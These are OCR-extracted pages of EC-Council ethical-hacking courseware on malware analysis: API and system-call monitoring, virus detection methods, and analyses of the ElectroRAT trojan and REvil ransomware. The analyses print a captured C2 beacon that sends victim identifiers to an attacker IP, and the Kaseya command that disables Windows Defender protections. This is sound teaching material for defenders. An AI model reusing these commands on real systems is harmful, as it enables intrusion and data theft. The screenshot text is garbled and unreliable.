Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Dynamic Malware Analysis: API Calls Monitoring @ Application programming interfaces (APIs) are parts of the Windows OS that allow external applications to access OS information suchas file systems, threads, errors, registry, and kernel @ Malware programs employ these APIs to access the operating system information and cause damage to the systems @ Analyzingthe API calls may reveal the suspected program’s interaction with the OS

API Monitor

API Monitor

allows

CE H you to monitor

and

display Win32 API calls made by applications

‘@ Use API call monitoring tools such as API Monitorto

monitorAPI calls made by applications

API Call Monitoring Tools

© APimetrics (https://apimetrics.io) @ Runscope (https://www.runscope.com) © AlertSite (https://smartbear.com)

Titps Janu apimonir Com

API Calls Monitoring Application programming interfaces (APIs) are parts of the Windows OS that allow external applications to access OS information such as file systems, threads, errors, registry, kernel, buttons, mouse pointer, network services, web, and the Internet. Malware programs also use these APIs to access the OS information and cause damage to the system. You need to gather the APIs related to the malware programs and analyze them to reveal their interaction with the OS as well as the activities they have been performing over the system. Use API call monitoring tools such as API Monitor to monitor API calls made by applications.

Module 07 Page 1153 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

API Monitor

Source: https://www.apimonitor.com API Monitor is a software that allows you to monitor and display Win32 API calls made by applications. It can trace any exported API and it displays a wide range of information, including function name, call sequence, input and output parameters, function return value, etc. It is a useful developer tool for understanding how Win32 applications work and for learning their tricks. af Action File Grid Help > 8 Il DG)

VB

vews-

§ @ | Buytow

Process and Thread» AP! Selector =a ‘API Name Fiter Profle:

v) | Save

API Categowy

API Name:

-

oO

x Delete —_IsErty API

T~ Only Selected Items

dskdpe. dl CO apvapiaa di

CD AdsBuldvavtnayiee CO AbsBuildVartirayStr CO ADsDecodetinayyData D ADsEncodeBinayData O ADsErumerateNent | (D AdsFreeAd:Values O ADsFreeE numerator | S Sumary I CO ADsGetLasténor CD ADsGetdbject apr va CO) odplusl CADsOpendbject Apr De | iettutidl Time § CO ADsSetLastémnor areal C) AdsTypeToPropVariant C teeter Pepi Mem ee D AlocaD st ee | BinarySDT oSecurtyDescrintor nets | Options D ConventSecDescriptorToVaiant foreoe C8 Deri dpay1 AP va cled by ide AP C ConetSecuiyDesinaT Seder 1 onvertTrusteeT oi on performance) =) picsrtinloadow a setious impact C) Show GetLastEnor Have alee (none) | sb mero Default Parameter Nu Length pees @ (none) 33 SelectAlAP! Clear AIAPL | Add DLL. ‘OK

a

L F

al J

Cancel

jul Figure 7.109: Screenshot of API Monitor

Some additional API monitoring tools are as follows: =

APImetrics (https://apimetrics.io)

=

Runscope (https://www.runscope.com)

=

AlertSite (https://smartbear.com)

Module 07 Page 1154

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Dynamic Malware Analysis: System Calls Monitoring strace strace intercepts and records the system calls by a Process and the signals received by the process

@ Syscallsor system calls act as an interface between the application and kernel @ It provides an interfacefor processes that are activated by an operating system

‘@

CE H

Monitoring system calls can help detect malware and understand its behavior

:

@ Itcan also reveal the type of damage the malware caused to the system

2

https://stroce.io

@ Tools such as strace can be used to view or trace the system callsin a Linux environment

System Calls Monitoring Syscalls or system calls act as an interface between an application and the kernel. It provides an interface for processes that are activated by an OS. System calls are generated by an application or program when it requires access to specific resources from the OS. They are usually generated during context switching from the user to kernel mode or kernel to user mode. The monitoring of system calls helps detect malware and in understanding the behavior of the detected malware. The monitoring of system calls can also reveal the type of damage caused to the system by the malware. Tools such as strace can be used to view or trace the system calls in a Linux environment.

=

strace Source: https://strace.io The strace tool intercepts and records system calls by a process and the signals received by the process. The name of each system call, its arguments, and its return value are printed on a standard error or to a file specified with the -o option. Run the following command for attaching the strace tool to the active process: strace

-p

Execute the following command path:

to view only system calls accessing a specific or given

strace

ls

-P

/var/empty

Run the following command to count time, calls, and errors for each system call: strace

Module 07 Page 1155 :

-c

ls

>

/dev/null

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Execute the following command to extract system calls and save the output in a text file: strace

-o

out.txt

./

root@ubuntu-Virtual-Machine: /home/ubuntu/strace# ps PID TTY TIME CMD 2930 pts/@ 60:00:00 sudo 2935 pts/@ 00:00:00 su 2936 pts/® 00:00 bash 3162

3230

pts/® pts/®

C

0© dbus-launch

00:00:00

ps

root@ubuntu-Virtual-Machine:/home/ubuntu/strace#|strace -p 2936] strace:

Process

2930

attached

ppoll([{fd=-1}, {fd=6, events=POLLIN}], 2, NULL, NULL,

Sf

Figure 7.110: Screenshot of strace

root@ubuntu-Virtual -Machtne: /home/ubuntu/strace# Is time seconds usecs/call calls errors

+00

0.600000

read write

e@ec0e00000000000000000

-000088 000000 800068 -000000 000000 -000088 -000068 -000068 000068 000060 000060 -000008 000068 -000000 000068 -000008 000000 000068 000000 000008 000000

222900000000000000000

+00 -00 -00 -00 -00 6.00 -00 +00 00 +00 -00 00 +00 -00 +00 -00 -00 +00 -00 +00 -00

close fstat

mmap

mprotect

munnap brk

rt_sigaction rt_stgprocmask toctl

pread64

access execve statfs

arch_pretl

getdents64

set_ttd_address openat set_robust_list prlimites 103

root@ubuntu-Virtual -Machine: /home/ubuntu/strace#

total

Figure 7.111: Screenshot showing the output of the strace command

Module 07 Page 1156

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Virus Detection Methods s

.

canning

Integrity

Checking

|

|

CE H

@ Once a virus is detected, it is possibleto write scanning programs that look for signature string characteristics of the virus

@

Integrity checking products work by reading the entire disk and recording integrity data that act as a signature

forthe files and system sectors

Interception | @ The interceptor monitors the operating system requests that are written to the disk |@ In code emulation techniques, the antivirus executes the malicious code insidea virtual machineto simulate CPU and memoryactivities |

Code

Emulation | © Thesetechniquesare considered very effective in dealing with encrypted and polymorphic viruses if the virtual machine mimics thereal machine .

Heuristic

Analysisis

|@ Heuristicanalysis can be staticor dynamic

5 7 i Instaticanalysis, the antivirus analyses the file format and code structureto determine 7if the code isfeiviral

|| 5 In dynamicanalysis, the antivirus performsa code emulation of the suspicious code to determine if the codes viral @

Virus Detection Methods The rule of thumb for virus and worm detection is that if an email seems suspicious (i.e., if the user is not expecting an e-mail from the sender and does not know the sender), or if the email header contains something that a known sender would not usually say, the user must be careful about opening the email, as there might be a risk of virus infection.

The best methods for virus detection are as follows: =

Scanning

=

Integrity checking

=

Interception

=

Code Emulation

=

Heuristic Analysis

Furthermore, a combination of these techniques can be more effective. =

Scanning A virus scanner is an essential software for detecting viruses. In the absence of a scanner, it is highly likely that the system will be attacked by a virus. Run antivirus tools

continuously and update the scan engine and virus signature database

on a regular

basis. Antivirus software is of no use if it does not know what to look for. The scanning for virus detection is performed in the following ways: o

Once a virus is detected in the wild, antivirus vendors across the globe identify its signature strings (characteristics).

Module 07 Page 1157 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

o

The vendors strings.

start writing

scanning

programs

that look for the virus’s signature

o

The resulting new scanners search memory files and system sectors for the signature strings of the new virus.

o

The scanner declares the presence of the virus once it finds and predefined viruses can be detected.

a match. Only known

Some critical aspects of virus scanning are as follows: Virus writers often create many new viruses by altering existing ones. It may take only a short time to create a virus that appears new but which is actually just a modification of an existing virus. Attackers make these changes frequently to confuse scanners. In addition, to enhance signature recognition, new scanners use detection techniques such as code analysis. Before investigating the code characteristics of a virus, the scanner examines the code at various locations in an executable file. Some scanners set up a virtual computer in a machine’s RAM and test the programs by executing them in this virtual space. This technique, called heuristic scanning, can also check and remove messages that might contain a computer virus or other unwanted

content.

Advantages of scanners o

They can check programs before execution.

o

They are the easiest way to check new software for known or malicious viruses.

Drawbacks of scanners

=

o

Old scanners may be unreliable. With the rapid increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available in the market.

o

Because viruses are developed more rapidly compared to scanners for combating them, even new scanners are not equipped to handle every new challenge.

Integrity Checking o o

Integrity checking products perform their functions by reading and recording integrated data to develop a signature or baseline for those files and system sectors. A

disadvantage of a basic integrity checker is that corruption caused by a bug from that caused by a virus.

it cannot

differentiate

file

o

There are some advanced integrity checkers available for analyzing and identifying the types of changes made by viruses.

o

Some integrity checkers combine antivirus techniques with create a hybrid tool. This simplifies the virus checking process.

Module 07 Page 1158

integrity checking to

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

=

Interception

o

The primary objective of an interceptor is to deflect logic bombs and Trojans.

o

The interceptor controls requests to the OS for network access or actions that cause threats to programs. If it finds such a request, it pops up and asks if the user wants to allow the request to continue.

o

There is no reliable way to intercept direct branches to low-level instructions for input and output instructions by the virus.

o

Some viruses can disable the monitoring program itself.

code or direct

Code Emulation Using code emulation, antivirus software executes a virtual machine to mimic CPU and memory activities. Here, virus code is executed on the virtual machine instead of the real processor. Code emulation efficiently deals with encrypted and polymorphic viruses. After the emulator is run for a long time, the decrypted virus body eventually presents itself to a scanner for detection. It also detects metamorphic viruses (single or multiple encryptions). A drawback of code emulation is that it is too slow if the decryption loop is very long.

=

Heuristic Analysis This method helps in detecting new or unknown viruses that are usually variants of an already existing virus family. Heuristic analysis can be static or dynamic. In static analysis, the antivirus tool analyzes the file format and code structure to determine if the code is viral. In dynamic analysis, the antivirus tool performs code emulation of the suspicious code to determine if the code is viral. The drawback of heuristic analysis is that it is prone to too many false positives (i.e., it tags benign code as viral); thus, a user might mistrust a positive test result and mistakenly assume a false alarm when a real attack occurs.

Module 07 Page 1159

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

CEH

Trojan Analysis: ElectroRAT @ ElectroRAT, a Go-program-based RAT, is designed to be compatible with common operating systems such as Windows, macOS, and Linux @ Itis delivered through a downloadable application for cryptocurrency usersto steal their private keys and access their crypto wallets

Propagation @

e

Initial Propagation and

Infection

c 3)

Attackers create various

fake profiles on cryptocurrency forums and social media groupsto lure victims into visiting their websites and downloading malicious applications

Targets

(2]

Jammvapp eTraderapp

‘crypto-forum

© maintaining Persistence

r~

C3]

wright © by

Trojan Analysis: ElectroRAT (Cont’d) Stage 1: Initial Propagation and Infection | ElectroRAT is distributed through Trojanized crypto trade management applications such as Jamm, eTrader,

and DaoPoke

@ Victims are lured into downloading these applications after navigating from blockchain-based or crypto discussion forums acs siennaons

t

Victim downloads the app

Exploitation ‘Trojan logs the keystrokes and steals private/API keys for crypto login

Trojan resides as the background. process to maintain persistence

@ Cryptocurrency users © Cryptocurrency wallets

Deploying Malware

https: feybernt.cm,https://wrw.intezercom is Strict Prohibited.

CE H

Stage 2: Deploying Malware When the victim downloads andinstalls the malicious app, ElectroRAT is executed as a background process while displaying a decoy interface to the user The fake eTrader application now promptsthe victim to createa new user account and enter a password, making the application appear legitimate In the background, the ElectroRAT payload is downloadedand executed by launching the appropriate OS shell in a separate process

‘Single platform for control of all your crypto!

wright © by

Module 07 Page 1160

Ett

Reserved. Reproduction i tricty Prohibited.

al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

. Trojan

__ Analysis:

ElectroRAT (Cont’d)

Stage 3: Exploitation @

lCE

The fake application lures the victims into connecting to

their cryptocurrency exchange accounts to record their

credentials or API keys

| Italso performs other functionalities such as uploading/downloading files, capturing screenshots, and running commands on the victim’s console

H

Stage 4: Maintaining Persistence @

Commandand control (C2) activity is initiated with an HTTP POST

request sentbythe fake application, which includesthe victim’s

identifiers, through TCP port 3000 by using the same servers that

were used to host the fake application |@ When the 2 server receivesthe request, it respondswith an emptyJSON response Attackers abuse victims’ identitiesto make illegitimate transactionsover time and send malware spam

Al Rights Reserved Reproduction is St

Trojan Analysis: ElectroRAT Source: https://cyberint.com, https://www.intezer.com ElectroRAT, a Go-program-based RAT, is designed to be compatible with common OSes such as Windows, macOS, and Linux. The Trojan is delivered through a downloadable application to cryptocurrency users for the malware creators to steal the private keys of victims and access their crypto wallets. The Trojan can be appended with trading applications, which can be promoted via anonymous or fake profiles through specific blockchain/cryptocurrency forums or social media platforms. After a successful attempt, the Trojanized applications load a decoy GUI on the victim machines, where ElectroRAT begins its operation as a background process to

conceal its presence. Propagation

Attackers create a variety of fake profiles on cryptocurrency forums and social media groups to lure victims into visiting their websites and downloading malicious applications.

Module 07 Page 1161 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

(1)

Initial Propagation and

(2)

Infection

left

Hosted on

Jamiivapp_ eTrader app

Deploying Malware

:

PA Crypto-forum

Victim downloads the app

(4) Maintaining Persistence

(3)

Exploitation

Trojan logs the keystrokes and steals private/API keys for crypto login

Trojan resides as the background process to maintain persistence

Figure 7.112: Process flow of an ElectroRAT infection

ElectroRAT Malware Attack Phases The following are the various stages involved in an ElectroRAT malware attack: =

Stage-1: Initial Propagation and Infection

Attackers have created different Trojanized applications for each of the major OSes: Windows, Linux, and macOS. ElectroRAT is distributed through these Trojanized crypto trade management applications such as Jamm and eTrader as well as cryptocurrency poker apps such as DaoPoker. Victims are lured into downloading these applications from blockchain-based or crypto discussion forums such as Bitcoin Talk and SteemCoinPan or Twitter/Telegram campaigns. The following screenshots show Jamm and eTrade applications hosted on the web:

ti

| =

-

Se

Best app to trade

and manage your crypto

) =

Fca

Figure 7.113: eTrader hosted on the Kintum homepage

Module 07 Page 1162

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

O vomm

a)

"14,3710 >

Single platform for control of all your crypto!

Q cowmiono ror inux

Figure 7.114: Homepage for the Jamm application

The following screenshots show promotional posts of these Trojanized applications by a fake user, from which victims are lured into the above pages to download the applications.

Trade on all cryptocurrency exchanges through one interface and discover the best opportunities to maximize your profits! anri.rixardinh [-3 | + May 24, 2020 HIVE CN Chinese Community Community

se | sewonos |

Good afternoon, in this topic, we are going to explain the main issues (technically) of trading in the cryptocurrency

market. And tell you a decision we made to help all traders best manage and monitor your cryptocurrency assets. No trouble and freedom. We hope to share our work with industry experts and receive feedback and suggestions for improving services. https://kintum.io What is Kintum?

The Kintum platform is an ideal tool for multiple exchange transactions on one interface. You can use services such as graphical indicators, trading via API orders, portfolio management arbitrage trading, etc. All of these are in one window. Currently, more than 20 cryptocurrency exchanges such as Binance, Kraken, Bitfinex, Poloniex, Coinbase Pro, etc. are cooperating with us. Figure 7.115: Screenshot of a cryptocurrency forum promoting the eTrader application

Module 07 Page 1163

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

tx simple machines forum.

‘October 24, 2020, 05:45:57 PM Welcome, Guest. Please lovin or resister News: Latest Btcoin Core relesse: 0.20.0 [Torrent]

2

(searen_]

& show Posts ‘Altemate crvstocurrences

/ Speculation (Altoins)/ Jamm - eryptocurrency trading bot

on: Todayat 05:39:45 PM

Single platform for control of all your crypto!

Jamm provides the user with convenient and powerful tools for trading, storing, exchanging and tracking their crypto assets! Use Jamm and give yourself great flexibility and convenience in many cryptocurrency operation! CRYPTO EXCHANGES Users can quickly transfer existing crypto assets from other sources. CRYPTO WALLETS Users can buy, transfer, and trade crypto assets across exchanges. DAPPS DApp users can quickly transfer their cryptocurrency to power your app. CRYPTO PORTFOLIOS. Investors can connect to exchanges and understand their crypto holdings and performance. TRADING PLATFORMS ‘Traders can transfer crypto assets between exchanges, execute trades and connect and consolidate trading history ‘and balance info. + TREASURY MANAGEMENT Companies can get a complete picture of crypto holdings across exchanges, transfer funds, and execute trades. Ready to get started? + + + + +

Jamm.to

Figure 7.116: Screenshot of Bitcoin forum promoting the Jamm application

The following screenshot shows a social media account promoting DaoPoker. The fake user account was suspended because of reports from users. é

DaoPoker

(000) ( Follow )

Disco d.gq/8qjPXuUg Telegramm - t.me/Daopoker

Figure 7.117: Social media account promoting the DaoPoker app

Module 07 Page 1164

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

For maximum damage, these fake applications have been created in Electron, a crossplatform framework that was developed using HTML and JavaScript. =

Stage-2: Deploying Malware When a victim downloads and installs the malicious eTrader application, ElectroRAT executes as a background process while displaying a decoy interface to the user. ElectroRAT runs behind the system while the GUI is operated from the front-end application. @@ eTrader Setup

-

Installing, please wait...

eer Figure 7.118: Screenshot of the fake eTrader application installation

The fake eTrader application now prompts the victim to create a new user account and enter a password, which makes the application appear legitimate.

Create your account Create passcode for your new account

Figure 7.119: Screenshot of the fake eTrader application creating a user account

In the background, the ElectroRAT payload is downloaded and executed by launching the appropriate OS shell in a separate process with the window hidden, as can be seen by unpacking the fake application to reveal the Electron JavaScript file electron.js.

Module 07 Page 1165

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

function launchWorker() witch (os.platform())

{

0 spawn( path. join(rootPath, Ol.

spawnOptions 0 ( path. join(resourcesPath, (1,

detached: true,

Figure 7.120: Screenshot of Electron showing how the fake eTrader application spawns ElectroRAT

The fake eTrader application mimics legitimate applications, convincing victims to interact with it. The following screenshot shows the appearance of the eTrader application upon its execution. eTrader i Market Scanner

@

Market & Pairs

Figure 7.121: eTrader application with decoy content

Module 07 Page 1166

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Stage-3: Exploitation The fake application further lures the victims into connect exchange accounts to record their credentials or API keys.

to their cryptocurrency

© cTrader

=o

Paste in API keys to connect ‘exchange accounts:

x

How to generate API key?

Figure 7.122: eTrader application collecting credentials and API keys

In the background, ElectroRAT captures keyboard entries to steal the private keys of the victims. Apart from keylogging, the Trojan facilitates other functionalities for remote attackers to upload and download files from the disk, capture screenshots, and run commands on the victim console. =

Stage 4: Maintaining Persistence

Command-and-control (C2) activity is initiated with an HTTP POST request sent by the fake application, which includes victim identifiers, through TCP port 3000 using the same servers that were used to host the fake application. When the C2 server receives the request, it provides an empty JSON response.

Module 07 Page 1167

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

POST /user HTTP/1.1 Host: 213.226.100.140:3000 User-Agent: go-resty/1.12.0 (https://github.com/go-resty/resty) Content-Length: 137 Accept: application/json Content-Type: application/json Accept-Encoding: gzip

{(id" :"36d1130a-acze-44f7-9de1",mac_name”:" HTTP/1.1 260 OK Access-Control-Allow-Origi DELETE GET,HEAD,PUT,POST, Access-Control-Allow-Methods: charset=utf-8 application/json; Content-Type: Content-Length: 2 Date: Tue, @3 Nov 2620 04:25:06 GIT Connection: keep-alive oO

,"os_version":"6.1.7601","user_name":"

\user","

Figure 7.123: Initial beacon and C2 response

As the Trojan resides as a background process, the remote attackers use the victim systems for additional promotion using their identities to make illegitimate transactions over time, send malware spam, and so on.

Module 07 Page 1168

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

CEH

Virus Analysis: REvil Ransomware

@ REvil, also known as Sodinokib, is dangerous ransomware associated with the GOLD SOUTHFIELD threat group that provides ransomware as a service for performing targeted attacks @ Attackers spread REvil via RDP servers, exploit kits, and backdoor softwareinstallation programs REvil Ransomware Attack Stages

Operation

|G REvil uses tools such as FileZilla to exfiltrate data and PsExec for the remote execution of the ransomware and its files

Execution and Lateral Movement

Other tools used by REvil include PC Hunter, AdFind, BloodHound, NBTScan, SharpSploit, third-party file sync tools, and Qakbot, a Trojan used to deliver ransomware

PC Hunter

Target Industries

REvil/Sodinokibi Ransomware nN

Transportation Financial sector

Oil and gas Technology Healthcare Manufacturing and so on

Defense Evasion and Discovery

Spam Email

Process Hacker

Download and Execute

Drive-by Compromise

CertUtil

B e f PowerShell

Pa

Killa

‘tps: log. guys com, hips Jan tenamera com

REvil Ransomware Attack Stages: Initial Access @ Attackers employa variety of techniques such as spam/spear-phishingemails with malicious attachments, RDP exploitation using valid accounts, and compromised websitesto gain initialaccess (@ These techniques allow attackers to download and execute malicious payloads on the victim machine using toolssuch as CertUtil and PowerShell

@ A recent approach followed by attackers for supply-chain compromisesto install Sodinstall or Sodinokibi on the target systems

REvil Ransomware Attack

‘Supply-chain compromise

"

Flow on KaseyaVSA | * creromsefie Servers

Module 07 Page 1169

and/or sites from a supplier’s auto-update feature © Uses CVE-2021-30116 tocompromisethe Kaseya VSA servers

CertUtil/PowerShell

SODINSTALL

© Executes additional PowerShell scripts for disabling Windows Defender and shell commands to launch the next stage of the attack using CertUtilto decrypt and execute “agent.exe” (SODINSTALL)

© Drops and executes MsMpend.exe and mpsvc.dl (Sodinokibi DLL) via DLL sideloading

REvil/Sodinokibi © Encryption @ Safeboot routine

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

REvil Ransomware Attack Stage: Download

and Execution

CE H

(@ The following are the methods used to download and execute the malicious payload ©

CVE-2019-2725: This method involves the remote code execution (RCE) of CertUtil or PowerShellto download and

execute REvil

@ Malspam: It uses macrosto download and execute REvil. Further, malspam includesan attachment (e.g., a POF file) thats used to download Qakbotand other components of the malware © Drive-by compromise directly downloads REvil © CVE-2018-13379, CVE-2019-11510, and valid accounts: This method uses RDP and PsExec to download and execute other componentsofthe malware @ DLL sideloading: This method uses MsMpeng.exe to load an REvil DLL that masqueradesas a legitimate DLL such as MpSve.dll, whichis dropped viaa customized installer such as “SODINSTALL” © CVE-2021-30116: This method exploitsa zero-day vulnerability against Kaseya VSA servers by compromisingthe Kaseya supply chain

@ In this phase, the ransomware is dropped along with its components and executed on the target systems

@ For example, in the Kaseya supply-chain compromise, after dropping the payload, it removes previously used binaries such as agent.crt and certutil.exe

|@ The decoded agent.exe comprises internal components such as SOFTIS and MODLIS

that are dumped into the Windows folder in the form of MsMpEng.exe and mpsvc.dll |@ As soon as MpMseng.exe executes and

invokes the export function (ServiceCrtMain), the REvil encryptor (mpsve.dll) loads and executes itself

Module 07 Page 1170

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

REvil Ransomware Attack Stage: Exploitation (Cont’d)

CE H

@ Now, REvil exploits Openssl to encrypt files @ The ransomwareallocates memory and drops the actual payload using functions such as “CreateFileMappingW” and “MapViewOfFile” ‘@ Now, REvil exposesits ransom

behavior by changing the configfiles, changinglocal firewallrules, creating its own registry keys, and addingits own valuesto the registry keys

‘@ Attackers now automatically log into

the victim’ssystem with their own accounts, encryptall the confidential files of the victim, and displaya ransom note

REvil Ransomware Attack Stages: Lateral Movement / Defense

cE H

Evasion and Discovery

| Lateral Movement

@ Attackers perform lateral movement in targeted attacks, in which they use RDP and PsExec tools for lateral movement

Defense Evasion and Discovery

@ At this stage, attackers use network discovery tools such as AdFind, SharpSploit, discover and infect other systems connected to the target network

BloodHound, and NBTScan to

@ The following techniques are used by REvil for defense evasion: © PC Hunter and Process Hacker to identify and terminate services and processes related to antivirus products © KillAV, a custom malicious binary designed to uninstall antivirus products © Safeboot routine, which is triggered when “-smode” is supplied as an argument and creates various new variants with RunOnce registries to restart from or to Safemode and bypass security solutions © DLL sideloading to bypass detection by runningas a legitimate file or process © PowerShell commands to compromise the supply chain and disable Windows Defender

Module 07 Page 1171

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

REvil Ransomware Attack Stages: Credential Access and Exfiltration / Command and Control

cE H om

Credential Access and Exfiltration

@ Attackers use tools such as SharpSploit, an attack framework, along with the mimikatz module to gain credential access

|@ The gathered information is exfiltrated using different methods such as FTP transfer via FileZilla or using thirdparty synchronization tools such as MegaSync, FreeFileSync, and Rclone Command and Control (C2)

@ At this stage, the REvil ransomware sends a report and system information to the attackers’ command and control server. | This is performed by creating a pseudorandom URL based on the following fixed format: @ https://{Domain}/{String 1}/{String 2}/{random characters}. {String 3}

Virus Analysis: REvil Ransomware Source: https://blog.qualys.com, https://www.trendmicro.com REvil, also known as Sodinokib, is dangerous ransomware associated with the GOLD SOUTHFIELD threat group that provides ransomware as a service (RaaS) for performing targeted attacks against multi-national companies. Attackers distribute this malware through supply-chain attacks (type of zero-day attacks), which requires the modification of code in third-party vendor software that is purchased by organizations according to their requirement. The threat group can also spread this malware via RDP servers, exploit kits, and backdoor software installation programs. REvil involves double extortion in its schemes, using stolen files to persuade its victims to pay a ransom. Attackers have performed bold attacks on popular public figures and organizations using REvil. The threat group exfiltrates critical information before encrypting it and threatens victims with the disclosure of their personal information on the dark web, underground forums, and blog sites. REvil Ransomware Operation

Attackers perform DDoS attacks on the target and directly communicate with the victim’s customers, business partners, and the media to force victims to pay a ransom. Further, attackers conduct auctions of the victim’s data to pressurize the victim further. It is highly targeted ransomware, in which attackers use highly sophisticated tools and employ customized infection chains to perform targeted attacks. REvil uses tools such as FileZilla to exfiltrate data and PsExec for the remote execution of the ransomware

and

its files. Other tools used

by REvil include

PC Hunter, AdFind,

NBTScan, SharpSploit, third-party file sync tools, and Qakbot, ransomware. Module 07 Page 1172

which

BloodHound,

is a Trojan to deliver

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

REvil Ransomware Attack Stages Execution and Lateral

Initial Access

Movement

*

B

t--p

Defense Evasion and Discovery

Fr Ss

RDP/Valid accounts

PC Hunter

REvil/Sodinokibi Ransomware

Spam Email

Process Hacker

Hi

Download and Execute

Drive-by Compromise

CertUtil

2

PowerShell

ef

Kill|AV

Figure 7.124: Attack stages of REvil ransomware

Supply-chain

CertUtil/PowerShell

compromise

© Arrives via compromised files

©

and/or sites froma

supplier's auto-update feature

© Uses CVE-2021-30116 to compromise the

Kaseya VSA servers

Executes additional PowerShell scripts for

disabling Windows

Defender and shell commands to launch

SODINSTALL

© Drops and executes MsMpend.exe and mpsvc.dll (Sodinokibi DLL) via DLL sideloading

REvil/Sodinokibi

@ Encryption @ Safeboot routine

the next stage of the attack using CertUtil to decrypt and execute

“agent.exe”

(SODINSTALL)

Figure 7.125: Specific attack flow of REvil ransomware on Kaseya VSA servers

=

Initial Access

To gain initial access, attackers employ various techniques such as spam/spear-phishing emails with malicious attachments, RDP exploitation using valid accounts, compromised websites, and so on. These techniques allow attackers to download and execute malicious payloads on the victim machine using tools such as CertUtil and PowerShell.

Module 07 Page 1173

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Attackers also perform more targeted attacks using RDP and PsExec to gain complete control of the target network and deploy malicious payloads. A recent approach followed by attackers to perform supply-chain compromise is to install Sodinstall or Sodinokibi on the target systems. For example, REvil threat actors previously used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) to gain initial access to the Kaseya VSA server platform. =

Download and Execution The following are the common malicious payload.

methods

used

by REvil to download

and

execute

a

©

CVE-2019-2725: This method involves the remote code execution (RCE) of CertUtil or PowerShell to download and execute REvil.

o

Malspam: This method uses macros to download and execute REvil. Further, malspam includes an attachment (for example, a PDF file) that is used to download Qakbot and other components of the malware.

o

Drive-by Compromise: This method directly downloads REvil.

o

CVE-2018-13379, CVE-2019-11510, and Valid Accounts: This method uses RDP and PsExec to download and execute other components of the malware such as antivirus, exfiltration tools, and REvil.

©

DLL Sideloading: This method uses a legitimate executable such as MsMpeng.exe to load an REvil DLL that masquerades as a legitimate DLL such as MpSvc.dll, which is dropped via a customized installer such as SODINSTALL.

©

CVE-2021-30116: This method exploits a zero-day vulnerability against Kaseya VSA servers via Kaseya supply-chain compromise. It drops the payload to Kaseya’s TempPath with the file name agent.exe. The VSA procedure used to deploy the encryptor was named “Kaseya VSA Agent Hot-fix.” The Kaseya VSA Agent Hot-fix procedure runs the following command: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 Cc: \Windows\System32\WindowsPowerShell\v1.0\powershell.exe MpPreference

-DisableRealtimeMonitoring

DisableIntrusionPreventionSystem

$true

>

$true

-DisableIOAVProtection

nul & Set$true

